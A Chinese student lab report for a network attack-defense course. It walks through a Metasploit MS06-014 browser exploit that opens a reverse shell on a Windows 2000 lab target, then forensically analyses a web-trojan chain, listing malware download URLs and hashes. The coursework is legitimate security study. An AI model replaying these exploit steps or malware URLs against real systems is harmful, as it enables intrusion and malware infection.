20251911 2025-2026-2 《网络攻防实践》实践十一报告

1. 实践内容

本次实践围绕 Web 浏览器渗透攻击展开，分为三个任务：
（1）Web 浏览器渗透攻击
使用 Metasploit 框架中的 MS06-014 漏洞模块，对 Windows 靶机进行远程渗透。目标是生成恶意网页脚本，诱导靶机访问后获取远程 Shell。

（2）取证分析实践——网页木马攻击场景分析
分析一个真实的网页挂马样本链。从 start.html 出发，逐层解密和下载相关脚本及二进制文件，通过 MD5 散列值在指定服务器获取对应文件，区分脚本与可执行程序，并对关键恶意代码进行反汇编或动态调试，还原攻击链路。

（3）攻防对抗实践——Web 浏览器渗透攻击攻防
攻击方使用 Metasploit 构造至少两个不同浏览器漏洞的渗透代码，经混淆后生成一个 URL，通过模拟钓鱼邮件发送。防守方需提取、解混淆并分析渗透代码，识别所针对的浏览器及漏洞编号。

2. 实践过程

2.1 Web 浏览器渗透攻击

实验环境

攻击机：Kali Linux（IP：192.168.200.64，主机名之前实验已设置为 zhangyuehui）
靶机：Windows 2000（IP：192.168.200.61）

实验过程

启动 Metasploit
在 Kali 终端中执行：
```
msfconsole
```
进入 msf6 交互界面。
搜索并选用 MS06-014 模块
```
search MS06-014
```
找到模块 exploit/windows/browser/ms06_014_ie_createobject

使用编号 0：
```
use 0
```

（这不代表错误，只是提醒当前尚未手动设置 payload，所以使用了默认值。）
3. 查看并选择 Payload
输入 show payloads 查看可用载荷。

选用反向 TCP Shell：

set payload generic/shell_reverse_tcp

配置参数
- 靶机 IP：set RHOST 192.168.200.61
- 攻击机 IP：set LHOST 192.168.200.64
- 可选设置服务器端口：set SRVPORT 8080
- 设置恶意 URL 路径：set URIPATH /
启动攻击
```
exploit
```
成功执行后，Metasploit 输出一个恶意链接：
```
http://192.168.200.64:8080/
```
靶机访问
在 Windows 2000 中启动 IE 浏览器，输入上述 URL。

靶机出现此页面

攻击机控制台显示有连接尝试。
获取会话
输入 sessions 查看已建立的会话

得到 ID 为 1。进入会话：
```
sessions -i 1
```
在远程 Shell 中执行 ipconfig

成功返回靶机网络配置，攻击完成。

2.2 取证分析实践——网页木马攻击场景分析

分析过程

起始文件 start.html
用记事本打开 start.html，查找 new09.htm 的引用。

发现两处引用，但无绝对路径，推断 new09.htm 与 start.html 位于同一目录。打开 new09.htm。
new09.htm 初步分析

该文件内容为经过加密的脚本。找到两个外部引用：
- http://aa.18dd.net/aa/kl.htm
- http://js.users.51.la/1299644.js
分别计算其 MD5（32 位小写）：

两个文件均为脚本文件。
解密 kl.htm

打开 7f60672dcd6b5e90b6772545ee219bd3

发现密钥为 \x73\x63\x72\x69\x70\x74

即字符串 script。使用工具解密

得到一段 JavaScript 代码，内容为大量十六进制转义字符。
将其转换后得到如下核心逻辑：
```
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf('OK')==-1){
    // 尝试创建多个 ActiveXObject 对象
    // 根据是否成功，动态加载不同的远程脚本：1.js, b.js, pps.js 或下载 bd.cab
}
```
该脚本通过检测不同 ActiveX 控件的存在性，实施分漏洞投递。
提取并分析后续文件
对脚本中出现的 URL 再次计算 MD5 并下载：
- http://aa.18dd.net/aa/1.js → 5d7e9058a857aa2abee820d5473c5fa4
- http://aa.18dd.net/aa/b.js → 3870c28cc279d457746b3796a262f166
- http://aa.18dd.net/aa/pps.js → 5f0b8bf0385314dbe0e5ec95e6abedc2
- http://down.18dd.net/bb/bd.cab → 1c1d7b3539a617517c49eee4120783b2
- 1.js
  
  包含一个下载执行逻辑，从 http://down.18dd.net/bb/014.exe 下载可执行文件，保存为 ..\ntuser.com 并静默运行。该文件即为恶意程序本体。
- b.js：经过 Packed 加密，解混淆后得到 Shellcode。
  
  Shellcode 中解码出 URL http://down.18dd.net/bb/bf.exe，下载并执行。
- pps.js：
利用 POWERPLAYER.PowerPlayerCtrl.1 漏洞，下载 http://down.18dd.net/bb/pps.exe。
- bd.cab：MD5 值为 1c1d7b3539a617517c49eee4120783b2，解压后得到 bd.exe，为百度工具条相关的恶意下载器。
获取最终恶意程序
对上述出现的可执行文件 URL 计算 MD5：
- http://down.18dd.net/bb/014.exe → ca4e4a1730b0f69a9b94393d9443b979
- http://down.18dd.net/bb/bf.exe → 268cbd59fbed235f6cf6b41b92b03f8e
- http://down.18dd.net/bb/pps.exe → ff59b3b8961f502289c1b4df8c37e2a4
- http://down.18dd.net/bb/bd.exe → 994f7810e6a461292cc337bf73981e2c
  使用 IDA 打开 pps.exe
  
  发现其会下载大量其他病毒文件，形成典型的“木马下载器”行为。